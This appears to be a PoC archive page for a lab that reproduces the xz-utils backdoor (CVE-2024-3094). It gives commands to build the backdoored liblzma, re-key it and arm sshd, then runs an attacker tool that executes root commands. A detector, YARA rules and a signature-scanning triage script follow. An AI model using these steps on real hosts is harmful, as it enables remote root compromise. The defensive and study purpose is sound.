Associated vulnerability
Description
The XZ backdoor vulnerability (CVE-2024-3094) explained in detail
Introduction
# 🛡️ Cybersecurity Project: Analyzing the XZ Backdoor in liblzma
## 📄 Overview
This project analyzes the supply-chain backdoor discovered in **xz-utils (liblzma)** releases **5.6.0** and **5.6.1** (CVE-2024-3094). The malicious code was not in the git tree but in the release tarballs: a modified `build-to-host.m4` extracted an obfuscated object file from the test-data archives and linked it into `liblzma`. At runtime the implant targets `sshd`, which on systemd-patched distributions loads `liblzma` transitively through `libsystemd`; it hooks `RSA_public_decrypt` so that an attacker holding the matching private key can pass a signed command inside an SSH certificate during public-key authentication and have `sshd` execute it as root before any credential is checked.
> ⚠️ This project is for **educational and defensive research** purposes only.
# Vulnerable machine
Clone this repository and build the Fedora-based container. The `docker run` line publishes the container's `sshd` (port 22) on port 2222 of the host:

```bash
git clone https://github.com/valeriot30/cve-2024-3094
cd cve-2024-3094
docker build -t fedora-dev .
docker run --privileged -it --rm -p 2222:22 fedora-dev
```

Inside the container, fetch a backdoored release tarball. The implant exists only in the release tarballs, not in the upstream git history, which is why an archive of the original tarballs is used:

```bash
cd ~
git clone https://github.com/thesamesam/xz-archive.git
cd xz-archive/5.6/ # The vulnerable version (it works as well with 5.6.1)
tar xzf xz-5.6.0.tar.gz
mv xz-5.6.0 ~
```

Export the build target. The injected m4 stage only unpacks and links the implant when it believes it is producing a distribution package on x86_64: it looks for `debian/rules` or for `RPM_ARCH` equal to `x86_64`, so without this export (or on any other architecture) the build yields a clean library:

```bash
export RPM_ARCH=$(uname -m)
```

Compile the library and copy the resulting shared object out of the build tree:

```bash
cd ~/xz-5.6.0/
./configure
make -j 8
cp ./src/liblzma/.libs/liblzma.so.5.6.0 ~
```

Clone the repository again inside the container and patch the library with a custom key. The implant only accepts payloads signed with the Ed448 key whose public half is embedded in the object; `patch.py` replaces that public key with one whose private key you control, so the attacker tool below can sign its own commands:

```bash
git clone https://github.com/valeriot30/cve-2024-3094
python3 cve-2024-3094/patch.py liblzma.so.5.6.0
```

Link the patched library into the system, then start `sshd` against it:

```bash
sh cve-2024-3094/inject.sh
env -i LANG=C /usr/sbin/sshd -D &
```

The `env -i LANG=C` prefix is not cosmetic: the implant inspects its environment before arming and stays dormant unless the process looks like an init-launched `sshd` (`argv[0]` is `/usr/sbin/sshd`, `LANG` is set, `TERM` is not set, and neither `LD_DEBUG` nor `LD_PROFILE` is present). Starting `sshd` from an interactive shell without clearing the environment leaves `TERM` set and the backdoor never hooks.
# Attacker machine
Clone this repository and compile the Go tool:

```bash
git clone https://github.com/valeriot30/cve-2024-3094
cd cve-2024-3094
go build
```

Run the tool with the vulnerable machine's address and the command to execute:

```bash
./bot -addr 127.0.0.2:2222 -cmd 'sleep 60'
```

The tool makes an SSH public-key authentication attempt whose certificate carries the signed command. The backdoored `sshd` runs the command as root via `system()` and then answers with an ordinary authentication failure, so nothing is returned over the connection. That is why the example uses `sleep 60`: a connection that hangs for about a minute before failing shows the payload executed, while a clean `sshd` rejects the key immediately. For a stronger confirmation use a command with a visible side effect (a file written in the container, a callback to your host), and replace `127.0.0.2:2222` with the host and port you mapped in `docker run`.
# Counter-Measures
## Using the detector
Run the detector:

```bash
sh detector.sh
```

## Using Yara
Match the YARA rules against the built library. The path assumes you are inside the cloned repository and that the library was copied to the parent directory as in the steps above; `-s` prints the matched strings:

```bash
yara rule.yar ../liblzma.so.5.6.0 -s
```
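An offline triage script, added here as an example and not part of the repository (it is neither `detector.sh` nor `rule.yar`), that a responder can run on a host or point at a copied `liblzma.so`. It combines the checks that matter for this implant: the installed `xz` version, whether `sshd` loads `liblzma` at all (upstream `sshd` does not; the systemd-notification patch pulls it in via `libsystemd`), which file that resolves to, and whether that file contains the function-prologue byte sequence Andres Freund published in the 2024-03-29 oss-security disclosure. `SAMPLE_LDD` is constructed sample input; everything else uses only the standard `xz --version` and `ldd` command lines.

```python
"""Offline triage for the xz-utils backdoor (CVE-2024-3094).

Added example, not the repository's detector.sh or rule.yar.
Run with no arguments to check the local host, or with a path to scan one file.
"""
import os
import re
import shutil
import subprocess
import sys
from typing import Optional

AFFECTED_VERSIONS = {"5.6.0", "5.6.1"}

# Prologue of the implant's hook function in the x86-64 object, as published in
# the original oss-security disclosure. A hit means "probably backdoored"; a
# miss does not prove a clean build (other architectures or variants differ).
BACKDOOR_SIGNATURE = bytes.fromhex(
    "f30f1efa554889f54c89ce5389fb81e7000000804883ec28488954241848894c2410"
)

# Constructed sample of `ldd /usr/sbin/sshd` output on a systemd-patched distro.
SAMPLE_LDD = (
    "\tlinux-vdso.so.1 (0x00007ffd5f3c0000)\n"
    "\tlibsystemd.so.0 => /lib64/libsystemd.so.0 (0x00007f1a2c000000)\n"
    "\tliblzma.so.5 => /lib64/liblzma.so.5 (0x00007f1a2bd00000)\n"
    "\tlibc.so.6 => /lib64/libc.so.6 (0x00007f1a2ba00000)\n"
)


def parse_xz_version(version_output: str) -> Optional[str]:
    """First x.y.z in `xz --version` output, e.g. 'xz (XZ Utils) 5.6.1'."""
    m = re.search(r"\b(\d+\.\d+\.\d+)\b", version_output)
    return m.group(1) if m else None


def version_is_affected(version: Optional[str]) -> bool:
    return version in AFFECTED_VERSIONS


def liblzma_from_ldd(ldd_output: str) -> Optional[str]:
    """Path of the liblzma that sshd resolves, or None if sshd never loads it.

    No liblzma line means this implant cannot reach sshd on that host.
    """
    for line in ldd_output.splitlines():
        if "liblzma" in line:
            m = re.search(r"=>\s*(\S+)", line)
            if m:
                return m.group(1)
    return None


def soname_version(path: str) -> Optional[str]:
    """Version encoded in a resolved file name such as /lib64/liblzma.so.5.6.0."""
    m = re.search(r"liblzma\.so\.(\d+\.\d+\.\d+)$", path)
    return m.group(1) if m else None


def contains_backdoor_signature(blob: bytes) -> bool:
    return BACKDOOR_SIGNATURE in blob


def scan_file(path: str) -> bool:
    with open(path, "rb") as f:
        return contains_backdoor_signature(f.read())


def main(argv):
    if len(argv) > 1:  # scan a single file, e.g. a liblzma.so copied off a host
        hit = scan_file(argv[1])
        print(f"{argv[1]}: {'SIGNATURE FOUND' if hit else 'signature not found'}")
        return 1 if hit else 0

    xz = shutil.which("xz")
    if xz:
        out = subprocess.run([xz, "--version"], capture_output=True, text=True).stdout
        ver = parse_xz_version(out)
        state = "AFFECTED release" if version_is_affected(ver) else "not 5.6.0/5.6.1"
        print(f"xz {ver}: {state}")

    sshd = shutil.which("sshd") or "/usr/sbin/sshd"
    ldd = shutil.which("ldd")
    if os.path.exists(sshd) and ldd:
        out = subprocess.run([ldd, sshd], capture_output=True, text=True).stdout
        lib = liblzma_from_ldd(out)
        if lib is None:
            print(f"{sshd} does not load liblzma: not reachable by this implant")
            return 0
        real = os.path.realpath(lib)  # liblzma.so.5 -> liblzma.so.5.6.x
        print(f"{sshd} loads {real} (version {soname_version(real)})")
        if scan_file(real):
            print("backdoor signature present: treat the host as compromised")
            return 1
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

The version check alone is not enough in either direction: distributions shipped patched 5.6.x builds with the implant removed, and a rebuilt 5.6.0 without `RPM_ARCH=x86_64` is clean, so the byte scan of the library `sshd` actually loads is the check that decides.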
File snapshot
[4.0K] /data/pocs/b4f00e04447c7425f3520641ccebc1365b93a457
├── [4.0K] assets
│ ├── [242K] liblzma.so.5.6.0
│ └── [242K] liblzma.so.5.6.0.patch
├── [5.7M] bot
├── [4.1K] bot.go
├── [ 620] configure.sh
├── [ 433] detector.sh
├── [ 522] Dockerfile
├── [ 771] generator.py
├── [ 165] go.mod
├── [ 558] go.sum
├── [ 208] inject.sh
├── [242K] liblzma.so.5.6.0.patch
├── [2.1K] patch_libzma.py
├── [1.5K] patch.py
├── [2.0K] README.md
├── [ 50] requirements.txt
├── [7.7K] reverse_shell.py
└── [ 670] rule.yar
1 directory, 18 files
Notes
1. Prefer accessing the code through its original source.
2. If the source has gone offline or is unreachable, e-mail f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. Shenlong has snapshotted this POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.